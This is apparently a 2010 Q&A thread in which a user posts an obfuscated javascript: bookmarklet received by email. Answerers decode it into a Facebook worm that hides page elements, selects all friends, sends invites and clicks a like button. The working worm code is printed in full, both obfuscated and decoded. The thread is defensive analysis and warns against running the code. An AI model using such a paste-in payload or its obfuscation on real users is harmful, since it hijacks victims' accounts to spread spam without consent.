What does this code do
Question
Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...
javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();
Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...
PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.
But ... Could someone tell me what it does?
3 answers
solution1
12 2010-05-24 11:00:35
a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
setTimeout(function () {
fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);
This is most likely an adaption of one of many Facebook worms that sends itself to all of your friends.
Looke here for a similar question.
Other versions of this used packer to obfuscate, and these could easily be deobfuscated by running the packer code through http://jsbeautifier.org/
solution2
12 ACCPTED 2010-05-24 11:27:16
I haven't decoded completely the code, but here's a couple of hints to it.
The variable _0xc100 defines an array of strings. The character are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \\x76 equals "v".
You can safely alert(_0xc100); to see it in plain text.
var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x76\x61\x6C\x75\x65",
"\x63\x6C\x69\x63\x6B",
"\x73\x75\x67\x67\x65\x73\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
"\x6C\x69\x6B\x65\x6D\x65"];
translates to an array containing these keywords
visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme
Now, the following statements ( DON'T EXECUTE THOSE ) use these keywords to actually execute functions.
For instance:
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
is equivalent to ( d is defined as document and mw is defined at the top)
document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";
which hides an element called app125879300771588_mwrapper
the following instructions give
document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;
which copies the content of app125879300771588_jop into app125879300771588_jode
and
document.getElementById("suggest").click();
which I guess clicks some "suggest" button.
Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)
They translate to
setTimeout(function () {
select_all();
}, 5000);
Which I assume selects all your friends...
setTimeout(function ()
{
SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
... send them invites
setTimeout(function ()
{
document.getElementById("likeme").click();
document.getElementById("app125879300771588_ifo").innerHTML =
document.getElementById("app125879300771588_ifc").value;
}, 5000);
... and presses a like button
Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.
solution3
4 2010-05-24 11:01:04
It's an obfuscated bookmarklet . You can unobfuscate it (carefully) to see the actual Javascript it will run. If you don't have a powerful need to, though, probably not worth bothering. I'd bin it and check with my friend to see if it really is coming from him/her, and if so, why.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.